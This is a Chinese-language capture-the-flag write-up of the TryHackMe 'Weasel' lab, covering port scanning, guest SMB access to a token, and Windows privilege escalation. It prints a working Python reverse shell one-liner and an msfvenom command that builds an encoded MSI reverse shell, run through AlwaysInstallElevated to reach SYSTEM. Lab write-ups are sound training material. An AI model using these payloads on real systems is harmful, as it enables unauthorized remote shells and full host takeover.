Weasel on Tryhackme

Before all

我想睡qqqq
🐳…
Victim’s IP : 10.10.254.66
Attacker’s IP : 10.9.195.189

Write up

RECON

port scan

Command
從今天開始我變成rustscan的信徒orz

1
rustscan -a  10.10.254.66 --ulimit 5000 -- -sC -sV

image

Result
有開ssh(22), http(8888), smb(445), 3389(rdp)

Exploit

先進去 port 8888逛逛
image

進去網站後會發現一個token,所以要先找出token是什麼。

smb

無法用一般的USERS當磁碟塊去連(
採用工具smbmap掃出磁碟名稱:
Command

1
smbmap -H 10.10.254.66 -u "guest"

Result

image

利用smbclient進行連線:
Command

1
smbclient \\\\10.10.254.66\\datasci-team

image

image
成功拿到Token!!!

web exploitation

拿到Token後進去,跑個python reverse shell直接RCE~
image
payload

1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.195.189",1004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Privilege Escalation

WSL to Windows

image
確認一下剛剛拿到的RCE,發現在WSL裡面…
看到可以檔案(由 ED25519 結尾,合理推斷是SSH KEY)
把內容都丟到rsa-ssh的檔案裡,透過ssh進行連線:
command

1
sudo ssh dev-datasci-lowpriv@10.10.254.66 -i rsa-ssh

image
好欸成功!!!

User to System

接下來的目標就是變成:nt authority\system
所需要打到機器裡的腳本都是使用在本地的python http server處理。
PrivescCheck
PrivescCheck就是一個可以在windows上以現在的權限取得相關資訊的工具,而在這次的靶機中是為了取得密碼以及獲得提權立足點資訊:
Github 連結

使用者密碼:

image

立足點:
AlwaysInstallElevated,這個設定會讓使用者可以下載MSI後以提權後的角色執行。
https://dmcxblue.gitbook.io/red-team-notes/privesc/unquoted-service-path

image

本地生成MSI reverse shell:
Command

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.195.189 lport=8443 -f msi -o ./x64winreverse.msi --encoder x64/xor --arch x64 --iteration 9

接著在靶機中執行:

1
2
runas /user:dev-datasci-lowpriv "msiexec /i C:\Users\dev-datasci-low
priv\Downloads\x64winreverse.msi /qn"

最後輸入剛剛透過PrivescCheck獲得的密碼即可。

image

監聽端口:
image

提權成功!!!

After all

累了現在,這台機器讓我多學了一個windows提權,開心owob
p.s.其實我一開始是打 WinPEAS進去,抓到奇怪的process在python3.10,應該可以提權。但是我不會打(可能透過msfconsole(?))